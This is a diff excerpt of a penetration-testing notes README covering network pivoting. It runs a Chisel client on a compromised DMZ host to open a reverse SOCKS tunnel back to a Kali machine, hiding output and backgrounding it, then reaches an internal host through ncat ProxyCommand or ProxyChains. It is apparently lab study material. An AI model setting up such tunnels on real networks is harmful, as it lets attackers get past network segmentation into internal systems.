seeu-inspace/easyg/README.md

 5. On `DMZ01`, run the Chisel client command`/tmp/chisel client <KALI01-IP>:8080 R:socks > /dev/null 2>&1 &`
 6. Now, you should be able to see inbound Chisel traffic and an incoming connection in the Chisel server
 7. Check if the SOCKS port has been opened by the `KALI01` Chisel server with `ss -ntplu`
+8. How to use the HTTP Tunnel
-8. Finally, pass an Ncat command to ProxyCommand to use the socks5 protocol and the proxy socket at `127.0.0.1:1080` to connect to `INTERNAL01`
+   - SSH with Ncat: Pass an Ncat command to ProxyCommand to use the socks5 protocol and the proxy socket at `127.0.0.1:1080` to connect to `INTERNAL01`
      - `ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' <username>@<IP>`
      - `%h` and `%p` tokens represent the SSH command host and port values
+   - Another option is to use ProxyChains by adding `socks5 127.0.0.1 1080` to `/etc/proxychains.conf` and prepending `sudo proxychains` to each command we want to run

 ### <ins>Linux Privilege Escalation</ins>